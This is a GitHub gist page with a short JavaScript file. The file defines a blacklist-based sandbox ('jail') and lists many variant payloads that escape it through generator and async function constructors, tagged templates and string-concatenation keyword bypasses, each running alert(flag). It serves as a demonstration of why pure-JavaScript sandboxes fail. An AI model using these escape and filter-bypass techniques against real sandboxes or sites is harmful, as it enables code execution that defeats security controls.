Last active
June 8, 2018 23:15
-
-
Save Spuffynism/07cc1bb9de7ed9c6e265828112b4dbf0 to your computer and use it in GitHub Desktop.
Variations of https://medium.com/@d0nut/why-building-a-sandbox-in-pure-javascript-is-a-fools-errand-d425b77b2899 jailbreaking example
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Variations of https://medium.com/@d0nut/why-building-a-sandbox-in-pure-javascript-is-a-fools-errand-d425b77b2899 | |
| jailbreaking example. | |
| */ | |
| var flag = "I'm the flag!"; | |
| function jail(code) { | |
| // quick string escape for inner strings | |
| code = code.replace(/["'`\\]/g, function(v){ return `\\${v}`}); | |
| var jail_script = "new Function("; | |
| // Blacklist all global scope values | |
| for(prop in window) { | |
| jail_script += `"${prop}", `; | |
| } | |
| // Disable eval/Function | |
| jail_script += `"eval", `; | |
| jail_script += `"Function.prototype.constructor = null; Function = null; ${code}");`; | |
| // Give us the Function object to make a call on. | |
| var jail_internal = eval(jail_script); | |
| jail_internal.call() | |
| } | |
| // original | |
| ((function*(){}).constructor("alert(flag)"))().next() | |
| // constructor not allowed | |
| ((function*(){})["c"+"onstructor"]("alert(flag)"))().next() | |
| // alert not allowed | |
| ((function*(){}).constructor("this["a"+"lert"](flag)"))().next() | |
| // shorter | |
| (function*(){}).constructor`alert(flag)```.next`` | |
| (function*(){}.constructor)`alert(flag)```.next`` | |
| (function*(){}.constructor`alert(flag)`)``.next`` | |
| (function*(){}.constructor`alert(flag)```).next`` | |
| (function*(){}.constructor`alert(flag)```.next)`` | |
| (function*(){}.constructor`alert(flag)```.next``) | |
| [function*(){}.constructor`alert(flag)```.next``] | |
| // even shorter & unnamed generator function | |
| ({*''(){}})[''].constructor`alert(flag)```.next`` | |
| // even shorter & no function* keyword | |
| ({*a(){}}).a.constructor`alert(flag)```.next`` | |
| ({*a(){}}.a).constructor`alert(flag)```.next`` | |
| ({*a(){}}.a.constructor)`alert(flag)```.next`` | |
| ({*a(){}}.a.constructor`alert(flag)`)``.next`` | |
| ({*a(){}}.a.constructor`alert(flag)```).next`` | |
| ({*a(){}}.a.constructor`alert(flag)```.next)`` | |
| ({*a(){}}.a.constructor`alert(flag)```.next``) | |
| [{*a(){}}.a.constructor`alert(flag)```.next``] | |
| // using async functions | |
| a=async()=>{},a.constructor`alert(flag)``` | |
| (async()=>{}).constructor`alert(flag)``` | |
| // using async & generator function | |
| [{async *a(){}}.a.constructor`alert(1)```.next``] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment